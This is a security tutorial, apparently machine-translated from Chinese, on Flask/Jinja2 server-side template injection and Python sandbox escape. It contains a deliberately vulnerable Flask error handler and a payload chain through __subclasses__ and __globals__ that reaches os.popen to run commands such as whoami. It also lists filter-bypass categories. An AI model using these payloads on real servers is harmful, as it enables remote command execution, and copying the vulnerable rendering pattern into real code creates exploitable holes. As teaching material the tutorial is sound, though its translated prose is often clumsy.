0x00 SSTI principle
Template injection, and SQL injection, implantation command similar principle, when the user input data is not reasonable process control, it is possible to insert the data in the block becomes part of the program, thereby changing the logic program execution.
0x01 escape the sandbox principle
Sandbox / sandbox
In the early days sandbox for testing suspicious software, viruses, and other harmful levels. Run in a sandbox, even if the virus causing serious harm or pose a threat to the real environment. Similar to the use of virtual machines.
Built-in functions
When you start the python interpreter, even if not created any variable or function, or there will be a lot of functions are available, these are the python's built-in functions.
-
Namespace: mapping from names to objects
1. Built-in namespace: python own name, produced when the interpreter starts up, store some python built-in name
2. The global name space: When a file is stored at the file level defined name
3. The local name space (may not exist): In the process of implementation of the document, if the function is called, it will produce the name of the function space used to store the names defined within the function
-
Loading order
Built-in namespace -> global namespace -> local name space
-
Find the name of the order
Local namespace -> global namespace -> built-in namespace
dir () function is used to display properties of an object, in the current environment is not provided so that the introduced module
View __builtins__
ingredients
Class inheritance
After the python for application of a variable corresponding to the method of Example class objects from a variable type, there are the following three methods class inheritance relationship:
__base__:获取对象的一个基类,一般情况下是object
__mro__:获取对象的一个基类,显示出整个继承链的关系,是一个列表,object在最底层故在列表中的最后,通过__mro__[-1]可以获取到
__subclasses__():继承此对象的子类,返回一个列表
The magic functions
__dict__
__globals__
__getattribute__()
0x02 test code
Before After After completing flask, take some of their own environment can not re-emerged vulnerability, read the article master Cai know request.url has not lead into a template. Urlencode automatically execute on request.url in the latest version of the flask, into request.args mass participation on it.
from flask import Flask
from flask import request
from flask import config
from flask import render_template_string
app = Flask(__name__)
app.config['SECRET_KEY'] = "flag{SSTI_123456}"
@app.route('/')
def hello_world():
return 'Hello World!'
@app.errorhandler(404)
def page_not_found(e):
template = '''
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>%s</h3>
</div>
{%% endblock %%}
''' % (request.args.get('404_url'))
return render_template_string(template), 404
if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True)
In the above code, the user directly controllable parameters request.args.get ( '404_url') rendered directly in the template and returns the page, this is not the correct rendering method will produce a template injection (SSTI).
0x03 using the method
From the variable -> Object -> base class -> subclass traversal -> process global variables, or a function module to find desired.
-
__class__
Returns the class object belongs
-
__bases__
It returns a tuple class inherits directly form
-
__base__
Returns a string class class inherits directly
-
__mro__
Return order to resolve the method call
-
__subclasses__()
Get all subclasses of class
-
__init__
So it comes classes contain init method, as a springboard to facilitate call globals
-
__globals__
Get function space which can be used under the module, all the variables and methods
When we construct http://192.168.0.103:5000/123?404_url={{1-1}}, you can see returns 0 instead of 1-1, indicating that the value of splice 404_url into the template for rendering.
"".__class__ //获取某个类
"".__class__.__mro__[1]
或者
"".__class__.__bases__ //获取object基类
"".__class__.__mro__[1].__subclasses__() //获取其所有子类
"".__class__.__mro__[1].__subclasses__()[1].__init__.__globals__ //查看os module或其他可读写文件的方法
Blasting with a number which can burp suite, another built-in class can be called to give os module
"".__class__.__mro__[1].__subclasses__()[303].__init__.__globals__["os"]["popen"]("whoami").read() //执行系统命令
0x04 python execute common commands
os.system()
os.system(command)
A return command execution result returned value, the successful return 0, -1 failure instead of returning the execution of the command output
os.popen()
os.popen(command[,mode[,bufsize] ])
popen method p.read () Gets the output terminal, and the need to close the close ()
subprocess
- subprocess.call(“command”)
- subprocess.Popen(“command”)
0x05 Bypass
Mainly in the following points
- Filter quotes
- Filter brackets
- Filter parentheses
- Filtering keywords
- filter{{}}
- Point number filter
- Module castration
Cai master article in a very detailed, can go to read
https://xz.aliyun.com/t/6885#toc-3
Reference link: https: //www.anquanke.com/post/id/188172#h3-3